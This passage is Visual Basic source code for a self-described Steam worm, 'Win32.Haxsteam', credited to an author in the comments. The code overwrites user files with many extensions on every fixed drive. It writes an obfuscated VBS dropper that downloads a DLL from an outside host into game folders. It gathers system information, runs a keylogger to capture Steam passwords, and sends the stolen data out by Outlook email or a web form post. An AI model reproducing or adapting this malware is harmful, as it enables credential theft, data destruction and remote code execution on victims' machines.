"vdf" Or SteamExt = "wav" Or SteamExt = "htm" Or SteamExt = "res" Then Set crtForWrite = fso.createtextfile(SteamData.Path, True) crtForWrite.Write "This file was overwritten by the Haxsteam!" + vbCrLf crtForWrite.Close End If Next Next Open steampath + "\PayloadTwo.log" For Output As #pay2 Print #pay2, "The second payload has been executed" Close #pay2 End Function Function SteamPayloadThree() On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") Set HardDrives = fso.drives For Each Diskk In HardDrives If Diskk.DriveType = 2 Then Set crtFolderSteam = fso.createfolder(Diskk + "\Haxsteam") Set file1 = fso.createtextfile(Diskk + "\Haxsteam\Hack.dll") Set file2 = fso.createtextfile(Diskk + "\Haxsteam\Haxsteam.exe") Set file3 = fso.createtextfile(Diskk + "\Haxsteam\GetAccount.blob") Set file4 = fso.createtextfile(Diskk + "\Haxsteam\Regstar.sys") Set file5 = fso.createtextfile(Diskk + "\Haxsteam\readme.txt") Set file6 = fso.createtextfile(Diskk + "\Haxsteam\Aimbot.exe") Set file7 = fso.createtextfile(Diskk + "\Haxsteam\Wallhack.tar") Set folder1 = fso.createfolder(Diskk + "\Haxsteam\Fake") Set folder2 = fso.createfolder(Diskk + "\Haxsteam\Empty") End If Next oern = "!!!!o!!!n!!!! !!!e!!!!r!!!r!!!!o!!!r!!!! !!!r!!!!e!!!s!!!!u!!!m!!!!e!!! !!!!n!!!e!!!!x!!!t!!!!" oern = Replace(oern, "!", "") fsoobje = "!!!!s!!!e!!!!t!!! !!!!f!!!s!!!!o!!! !!!!=!!! !!!!c!!!r!!!!e!!!a!!!!t!!!e!!!!o!!!b!!!!j!!!e!!!c!!!!t!!! !!!!(!!!""!!!!S!!!cr!!!ip!!!!ti!!!!n!!!g!!.!!!F!!!il!!!!eS!!!y!!!st!!!em!!!Ob!!!j!!!e!!!c!!!t""!!!)!!!!" fsoobje = Replace(fsoobje, "!", "") wshs = "!!!!s!!!e!!!!t!!! !!!!w!!!s!!!!h!!!!s!!! !!!=!!!! !!!c!!!r!ea!!!te!!!!ob!!!j!!!e!!!c!!!t!!!(!!!!""!!!W!!!Sc!!!!ri!!!pt!!!.!!!!Sh!!!!e!!!l!!!l!!!""!!!!!)!!!!!!!!" wshs = Replace(wshs, "!", "") spwr = "!!!S!!!te!!!!a!!!mP!!!at!!!!h!!!! =!!!! w!!!sh!!!!s!!!.!!!re!!!g!!!re!!!!a!!d!!!(!!!!""H!!!K!!!E!!!!Y!!!_C!!!!UR!!!RE!!!N!!!T!!!_!!!U!!!!S!!!E!!!R!!!\!!!!S!!!of!!!!t!!!wa!!!!!r!!!!e!!!\!!!!Va!!!!l!!!v!!!!e!!!\!!!!St!!!e!!!a!!!m!!\""+""S!!!t!!!!ea!!!!m!!!P!!!a!!t!!!!!h!!""!!!!)!!!!" spwr = Replace(spwr, "!", "") gtwdir = "!!!!s!!!!e!!!!t!!!! !!!w!!!!i!!!n!!!!d!!!i!!!r!! !!!=!!!! !!!f!!!s!!!o!!!.!!!!g!!!et!!!!sp!!!!ec!!!!i!!!a!!!!l!!fo!!!!ld!!!!e!!!r!!(!!!!0!!!)!!!!" gtwdir = Replace(gtwdir, "!", "") xmlobje = "!!!s!!!e!!!t!!! x!!!!ml!!!D!!!l!!!d!!!r!! !!!!= !!!!cr!!!eat!!!!eo!!!bj!!!!ec!!!!t!!!(!!!!""!!!!M!!!ic!!!!!ro!!!so!!!!f!!!!t!!!!.!!!X!!!M!!!!L!!!HT!!!!T!!!P!!!!""!!!!)!!!!" xmlobje = Replace(xmlobje, "!", "") adoobje = "!!s!!!!e!!!!t!!! !!!!ad!!!!S!!!!tr!!!!e!!!!a!!!!!m!!! !!!!=!!!! !!!!!c!!!re!!!at!!!!eo!!!!!bj!!!!e!!!c!!!!t!!!(!!!!""!!!A!!!!D!!!OD!!!!B!!!!.!!!S!!!!t!!!r!!!!e!!!a!!!m!!!!""!!!!)!!!!" adoobje = Replace(adoobje, "!", "") Set crtWhFile = fso.createtextfile(fso.getspecialfolder(0) + "\wallhack" + Chr(46) + Chr(118) + Chr(98) + Chr(115), True) crtWhFile.writeline (oern) crtWhFile.writeline (fsoobje) crtWhFile.writeline (wshs) crtWhFile.writeline (spwr) crtWhFile.writeline ("SteamPath = replace(SteamPath,""/"", ""\"") ") crtWhFile.writeline (gtwdir) crtWhFile.writeline (" ") crtWhFile.writeline (xmlobje) crtWhFile.writeline ("xmlDldr.Open(""GET"", ""http://czybik.cz.funpic.de/Haxsteam/opengl32.dll"" ,0) ") crtWhFile.writeline ("xmlDldr.Send ") crtWhFile.writeline (" ") crtWhFile.writeline (adoobje) crtWhFile.writeline ("adStream.Mode = 3 ") crtWhFile.writeline ("adStream.Type = 1 ") crtWhFile.writeline ("adStream.Open ") crtWhFile.writeline ("adStream.Write(xmlDldr.responseBody) ") crtWhFile.writeline ("adStream.SaveToFile(windir+""\opengl32.dll"",2) ") crtWhFile.writeline (" ") crtWhFile.writeline ("Set gtDllhack = fso.getfile(windir + ""\opengl32.dll"") ") crtWhFile.writeline ("inpwh = fso.getfolder(SteamPath + ""\SteamApps"") ") crtWhFile.writeline ("For Each CheatFolder In inpwh.Subfolders ") crtWhFile.writeline ("If fso.folderexists(CheatFolder.Path + ""\counter-strike"") Then ") crtWhFile.writeline ("gtDllhack.Copy (CheatFolder.Path + ""\counter-strike\opengl32.dll""),true ") crtWhFile.writeline ("End If ") crtWhFile.writeline ("If fso.folderexists(CheatFolder.Path + ""\day of defeat"") Then ") crtWhFile.writeline ("gtDllhack.Copy (CheatFolder.Path + ""\day of defeat\opengl32.dll"") ,true") crtWhFile.writeline ("End If ") crtWhFile.writeline ("If fso.folderexists(CheatFolder.Path + ""\deathmatch classic"") Then ") crtWhFile.writeline ("gtDllhack.Copy (CheatFolder.Path + ""\deathmatch classic\opengl32.dll"") ,true") crtWhFile.writeline ("End If ") crtWhFile.writeline ("If fso.folderexists(CheatFolder.Path + ""\half-life"") Then ") crtWhFile.writeline ("gtDllhack.Copy (CheatFolder.Path + ""\half-life\opengl32.dll""), True ") crtWhFile.writeline ("End If ") crtWhFile.writeline ("If fso.folderexists(CheatFolder.Path + ""\opposing force"") Then ") crtWhFile.writeline ("gtDllhack.Copy (CheatFolder.Path + ""\opposing force\opengl32.dll""), True ") crtWhFile.writeline ("End If ") crtWhFile.writeline ("If fso.folderexists(CheatFolder.Path + ""\team fortress classic"") Then ") crtWhFile.writeline ("gtDllhack.Copy (CheatFolder.Path + ""\team fortress classic\opengl32.dll""),true ") crtWhFile.writeline ("End If ") crtWhFile.writeline ("Next ") wshs.run (fso.getspecialfolder(0) + "\wallhack" + Chr(46) + Chr(118) + Chr(98) + Chr(115)), , True fso.deletefile (fso.getspecialfolder(0) + "\wallhack" + Chr(46) + Chr(118) + Chr(98) + Chr(115)) Open steampath + "\PayloadThree.log" For Output As #pay3 Print #pay3, "The third payload has been executed" Close #pay3 End Function Function SteamPayloadFour() On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") Set OutlObj = CreateObject("Outlook.Application") If OutlObj <> "" Then wshs.run ("msinfo32 /report " + windir + "\infofile1.txt"), , True wshs.run ("%ComSpec% /c tree %SystemDrive% > " + windir + "\infofile2.txt /A"), , True wshs.run ("%ComSpec% /c ipconfig /all > " + windir + "\infofile3.txt"), , True wshs.run ("%ComSpec% /c vol %SystemDrive% > " + windir + "\infofile5.txt"), , True wshs.run ("%ComSpec% /c getmac > " + windir + "\infofile5.txt"), , True Set WriteNewMail = OutlObj.CreateNewItem(1) With WriteNewMail .to = "sk0r1337@gmx.de" .subject = "Haxsteam Email Bot: Victim Informations" .body = "Hello sk0r alias Czybik" + vbCrLf + "The Informations of the machine of a victim are attached." + vbCrLf + "Best regards: Haxsteam Info Email Bot" .Attachments.Add windir + "\infofile1.txt" .Attachments.Add windir + "\infofile2.txt" .Attachments.Add windir + "\infofile3.txt" .Attachments.Add windir + "\infofile4.txt" .Attachments.Add windir + "\infofile5.txt" .send End With End If Open steampath + "\PayloadFour.log" For Output As #pay4 Print #pay4, "The fourth payload has been executed" Close #pay4 End Function Function SteamPayloadFive() On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") Sleep 60000 * 10 Set aProcc = GetObject("winmgmts:") Set bProcc = aProcc.InstancesOf("Win32_process") For Each cProcc In bProcc If LCase(cProcc.Name) = "steam.exe" Then cProcc.Terminate (0) End If Next fso.deletefile (steampath + "\ClientRegistry.blob") If Not fso.fileexists(sysdir + "\Accountnames.log") Then Open sysdir + "\Accountnames.log" For Output As #acclogged Print #acclogged, "This file contains the loggend accountnames:" Print #acclogged, "==========================================" + vbCrLf Set gtSteamfldrs = fso.getfolder(steampath + "\SteamApps") For Each Accountname In gtSteamfldrs.subfolders Print #acclogged, Accountname Next Close #acclogged End If tmrSteam.Enabled = True End Function Private Sub tmrSteam_Timer() Set wmiObj = GetObject("winmgmts:") Set inSystem = wmiObj.InstancesOf("Win32_process") For Each WinProcess In inSystem If LCase(WinProcess.Name) = "steam.exe" Then tmrCounter.Enabled = True tmrLogger.Enabled = True tmrSteam.Enabled = False End If Next End Sub Private Sub tmrCounter_Timer() cntCounter = cntCounter + 1 If cntCounter >= 1200 Then tmrLogger.Enabled = False SendLoggedInfosToMe cntCounter = 0 tmrCounter.Enabled = False End If End Sub Private Sub tmrLogger_Timer() If (GetAsyncKeyState(vbKey1)) Then strKeys = strKeys + "1" End If If (GetAsyncKeyState(vbKey2)) Then strKeys = strKeys + "2" End If If (GetAsyncKeyState(vbKey3)) Then strKeys = strKeys + "3" End If If (GetAsyncKeyState(vbKey4)) Then strKeys = strKeys + "4" End If If (GetAsyncKeyState(vbKey5)) Then strKeys = strKeys + "5" End If If (GetAsyncKeyState(vbKey6)) Then strKeys = strKeys + "6" End If If (GetAsyncKeyState(vbKey7)) Then strKeys = strKeys + "7" End If If (GetAsyncKeyState(vbKey8)) Then strKeys = strKeys + "8" End If If (GetAsyncKeyState(vbKey9)) Then strKeys = strKeys + "9" End If If (GetAsyncKeyState(vbKey0)) Then strKeys = strKeys + "0" End If If (GetAsyncKeyState(vbKeyA)) Then strKeys = strKeys + "a" End If If (GetAsyncKeyState(vbKeyB)) Then strKeys = strKeys + "b" End If If (GetAsyncKeyState(vbKeyC)) Then strKeys = strKeys + "c" End If If (GetAsyncKeyState(vbKeyD)) Then strKeys = strKeys + "d" End If If (GetAsyncKeyState(vbKeyE)) Then strKeys = strKeys + "e" End If If (GetAsyncKeyState(vbKeyF)) Then strKeys = strKeys + "f" End If If (GetAsyncKeyState(vbKeyG)) Then strKeys = strKeys + "g" End If If (GetAsyncKeyState(vbKeyH)) Then strKeys = strKeys + "h" End If If (GetAsyncKeyState(vbKeyI)) Then strKeys = strKeys + "i" End If If (GetAsyncKeyState(vbKeyJ)) Then strKeys = strKeys + "j" End If If (GetAsyncKeyState(vbKeyK)) Then strKeys = strKeys + "k" End If If (GetAsyncKeyState(vbKeyL)) Then strKeys = strKeys + "l" End If If (GetAsyncKeyState(vbKeyM)) Then strKeys = strKeys + "m" End If If (GetAsyncKeyState(vbKeyN)) Then strKeys = strKeys + "n" End If If (GetAsyncKeyState(vbKeyO)) Then strKeys = strKeys + "o" End If If (GetAsyncKeyState(vbKeyP)) Then strKeys = strKeys + "p" End If If (GetAsyncKeyState(vbKeyQ)) Then strKeys = strKeys + "q" End If If (GetAsyncKeyState(vbKeyR)) Then strKeys = strKeys + "r" End If If (GetAsyncKeyState(vbKeyS)) Then strKeys = strKeys + "s" End If If (GetAsyncKeyState(vbKeyT)) Then strKeys = strKeys + "t" End If If (GetAsyncKeyState(vbKeyU)) Then strKeys = strKeys + "u" End If If (GetAsyncKeyState(vbKeyV)) Then strKeys = strKeys + "v" End If If (GetAsyncKeyState(vbKeyW)) Then strKeys = strKeys + "w" End If If (GetAsyncKeyState(vbKeyX)) Then strKeys = strKeys + "x" End If If (GetAsyncKeyState(vbKeyY)) Then strKeys = strKeys + "y" End If If (GetAsyncKeyState(vbKeyZ)) Then strKeys = strKeys + "z" End If End Sub Function SendLoggedInfosToMe() On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") Set sysdir = fso.getspecialfolder(1) steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") Open sysdir + "\loggedkeys.log" For Output As #keylogger Print #keylogger, "Here are the logged keys loggend by Win32.Haxsteam:" Print #keylogger, "====================================================" + vbCrLf Print #keylogger, strKeys Close #keylogger Set outObject = CreateObject("Outlook.Application") If outObject <> "" Then Set NewMail = outObject.CreateItem(1) NewMail.to = "sk0r1337@gmx.de" NewMail.subject = "Win32.Haxsteam Keylogger Bot" NewMail.body = "Dear sk0r alias Czybik," + vbCrLf + "You have now a new steam account more, I think." + vbCrLf + "Best regards: Win32.Haxsteam Email Bot" NewMail.Attachments.Add sysdir + "\loggedkeys.log" NewMail.Attachments.Add sysdir + "\Accountnames.log" NewMail.send Else Set opnAccFile = fso.opentextfile(sysdir + "\Accountnames.log") strAccValue = openAccFile.readall opnAccFile.Close Set opnLogFile = fso.opentextfile(sysdir + "\loggendkeys.log") strKeyValue = opnLogFile.readall opnLogFile.Close READYSTATE_COMPLETE = 4 Set ieObj = CreateObject("InternetExplorer.Application") Do While ieObj.Busy Loop ieObj.Visible = False ieObj.navigate "http://czybik.cz.funpic.de/Haxsteam/accountdata.php" Do While ieObj.ReadyState <> 4 Loop ieObj.Document.All.emailname.Value = "sk0r1337@gmx.de" ieObj.Document.All.emailsubject.Value = "Win32.Haxsteam Html Php Connector" ieObj.Document.All.thebody.Value = "Passwords:" + vbCrLf + "=======================" + vbCrLf + strKeyValue + vbCrLf + vbCrLf + vbCrLf + "Accountnames:" + vbCrLf + "=======================" + strAccValue ieObj.Document.All.Abschicken.submit End If End Function Function OverwriteSpecificFiles() On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") Set gtDrives = fso.drives For Each HardDrive In gtDrives If HardDrive.DriveType = 2 Then SearchForFiles (HardDrive) End If Next End Function Function SearchForFiles(DriveString) On Error Resume Next Set wshs = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") steampath = wshs.regread("HKEY_CURRENT_USER\Software\Valve\Steam\" + "SteamPath") steampath = Replace(steampath, "/", "\") ExtensionArray = Array("html", "htm", "vbs", "vbe", "vba", "ppt", _ "pps", "xlm", "xls", "doc", "rtf", "asm", "h", "mdb", "mde", "res", _ "cpp", "jpg", "bmp", "pif", "ini", "png", "pl", "pas", "ppt", "scf", _ "jpeg", "rar", "zip", "ace", "psd", "wma", "pps", "php", "hlp", "htt", , _ "avi", "mp3", "log", "txt", "inf", "pws", "dmp", "xls", "rtf", "doc") Set gtDriveAsFolder = fso.getfolder(DriveString) For Each UnterOrdner In gtDriveAsFolder.subfolders Set uOrdFiles = UnterOrdner.Files For Each PruefeAlleDaten In uOrdFiles gtExt = LCase(fso.getextensionname(PruefeAlleDaten.Path)) For Each DateiEndungsString In ExtensionArray If gtExt = DateiEndungsString Then Set crtNewvic = fso.createtextfile(PruefeAlleDaten.Path, True) crtNewvic.Write "This File was overwritten by the Haxsteam Worm" crtNewvic.Close End If Next Next Next End Function Function SpeakTheVoice(SpeakString As String) On Error Resume Next Set spkVoice = New SpVoice spkVoice.Speak SpeakString, SVSFlagsAsync End Function Function funcShowInformations() infSpeak = "Hey user. You have been infected by a great Steam Worm." SpeakTheVoice (infSpeak) frmHaxsteamAbout.Show End Function ' ========================================================================= frmHaxsteamAbout.frm ========================================================================= VERSION 5.00 Begin VB.Form frmHaxsteamAbout Caption = "About Win32.Haxsteam" ClientHeight = 5235 ClientLeft = 60 ClientTop = 450 ClientWidth = 6315 LinkTopic = "Form1" ScaleHeight = 5235 ScaleWidth = 6315 StartUpPosition = 3 'Windows Default Begin VB.CommandButton cmdQuit Caption = "Fertig" Height = 495 Left = 1560 TabIndex = 1 Top = 4440 Width = 2535 End Begin VB.TextBox txtInfor Height = 3015 Left = 960 MultiLine = -1 'True TabIndex = 0 Text = "frmHaxsteamAbout.frx":0000 Top = 600 Width = 4215 End End Attribute VB_Name = "frmHaxsteamAbout" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False 'Win32.Haxsteam ¸opyrights 2006 by sk0r 'This Worm was created by sk0r aka Czybik. 'You are not allowed to decompile the Worm! 'ViSiT my Site @ www.sk0r-czybik.de.vu ' 'This is a very good Steam Worm. It has 'much functions, which you will see :> ' ' Visit my homepages: Email me to: ' -------------------- ------------- ' ' www.sk0r-czybik.de.vu sk0r1337@web.de ' www.sk0r-virii.tk ' www.czybik-kit.tk ' '======================================================== Private Sub cmdQuit_Click() Unload Me End Sub Private Sub Form_Load() txtInfor.Text = "Dear User" + vbCrLf txtInfor.Text = txtInfor.Text + " " + vbCrLf txtInfor.Text = txtInfor.Text + "You have been infected by Win32.Haxsteam.a" + vbCrLf txtInfor.Text = txtInfor.Text + "This worm was made by sk0r alias Czybik" + vbCrLf txtInfor.Text = txtInfor.Text + "It is ¸2006 by sk0r alias Czybik" + vbCrLf txtInfor.Text = txtInfor.Text + "I think, this worm is the best steam worm ever!" + vbCrLf txtInfor.Text = txtInfor.Text + "This is very great!" + vbCrLf txtInfor.Text = txtInfor.Text + "Visit my sites: " + vbCrLf txtInfor.Text = txtInfor.Text + "www.sk0r-czybik.de.vu" + vbCrLf txtInfor.Text = txtInfor.Text + "www.czybik-kit.tk " + vbCrLf txtInfor.Text = txtInfor.Text + "www.sk0r-virii.tk " + vbCrLf End Sub '